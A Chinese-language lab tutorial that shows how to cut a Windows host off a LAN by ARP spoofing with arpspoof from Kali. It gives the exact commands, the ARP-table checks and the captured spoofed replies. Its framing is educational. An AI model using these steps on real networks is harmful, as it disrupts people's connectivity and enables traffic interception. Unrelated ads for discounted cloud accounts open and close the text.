ARP渗透与攻防(二)之断网攻击

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

ARP断网攻击

系列文章

ARP渗透与攻防(一)之ARP原理

1.环境准备

kali 作为ARP攻击机IP地址192.168.110.26 MAC地址00:0c:29:fc:66:46

win10 作为被攻击方IP地址192.168.110.12 MAC地址1c:69:7a:a4:cf:92

网关路由器IP地址192.168.110.1 MAC地址e4:3a:6e:35:98:00

需要注意的时两台主机需要在同一个局域网并且网络通畅。

ping www.mashibing.com

在这里插入图片描述

计算上网的过程示意图

在这里插入图片描述

2.ARP断网攻击原理

.ARP断网攻击的原理是向目标主机不断的发送ARP报文然后将其报文中的网关Mac地址设置成为攻击机的主机MAC地址
然后目标主机想要访问网络发送数据包时都会发送到攻击机然后攻击机只需要做一个丢弃数据包的命令就可以断掉目标主机的网络了。

3.arpspoof介绍:

arpspoof [spuːf] 是一个好用的ARP欺骗工具攻击者通过毒化受害者ARP缓存将网关MAC替换为攻击者MAC然后攻击者可截获受害者发送和收到的数据包从而获取受害者账户、密码等相关敏感信息。Kali linux中自带了该工具。

在这里插入图片描述

命令使用讲解

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i指定网卡
-c:攻击机的IP
-t 目标机器的IP
-r网关IP

4.具体攻击步骤

1.首先确保两台机器在同一局域网络下并且可以互相通讯。

​ 1.1查看kali的IP和MAC地址

ip a

在这里插入图片描述

​ 1.2 查看windows的IP和MAC地址

ipconfig /all

在这里插入图片描述

​ 1.3 然后我们通过windows ping kali去保证我们的网络通畅:

ping 192.168.110.26

在这里插入图片描述

​ 1.4 win10 查看arp表记录网关的信息

arp -a | findstr 192.168.110.1

在这里插入图片描述
可以看到现在网关绑定的MAC地址是正确的是e4:3a:6e:35:98:00

2.kali进行断网攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12
-i:指定网卡
-r:指定网关ip
-t:指定靶机ip

在这里插入图片描述
这个时候kali机就会发起一个攻击将在windows的arp表里存储着的网关的MAC地址替换为Kali机的MAC地址导致中间人攻击此时Windows访问外部的网络就不通过网关来转发了而是通过我们的攻击机进行转发。但是由于我们的kali机没有开启路由转发的功能导致windows机的流量虽然经过了kali转发但最终并没有访问外网。

3.win10 查看网络连接 和 kali 的网络链接

ping www.mashibing.com

在这里插入图片描述
在这里插入图片描述

可以看到我们Windows ping 不通外部网络了

4.win10查看此时的arp表

arp -a 
或者
arp -a |findstr 192.168.110.1

在这里插入图片描述

5.kali机器结束断网攻击

ctrl+C

在这里插入图片描述

6.win10重新查看网络状态

ping www.mashibing.com

在这里插入图片描述
可以看到Windows机器又重新恢复了上网功能

7.win10重新查看arp表

arp -a |findstr 192.168.110.1

在这里插入图片描述
我们网关的MAC地址也从kali机的MAC地址恢复成了正常的MAC地址

5.ARP断网攻击原理深入分析

**1.ARP攻击断网的过程 **

0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at 0:c:29:fc:66:46
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 0:c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.1网关  192.168.110.12 的mac地址是 00:0c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.12靶机 192.168.110.1 的mac地址是 00:0c:29:fc:66:46

Ctrl+C停止攻击后
0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at e4:3a:6e:35:98:0
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 1c:69:7a:a4:cf:92
ARP攻击机器 重新告诉 192.168.110.12靶机 192.168.110.1 的mac地址是 e4:3a:6e:35:98:0
ARP攻击机器 重新告诉 192.168.110.1网关  192.168.110.12 的mac地址是 1c:69:7a:a4:cf:92

2.ARP断网原理图

在这里插入图片描述

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6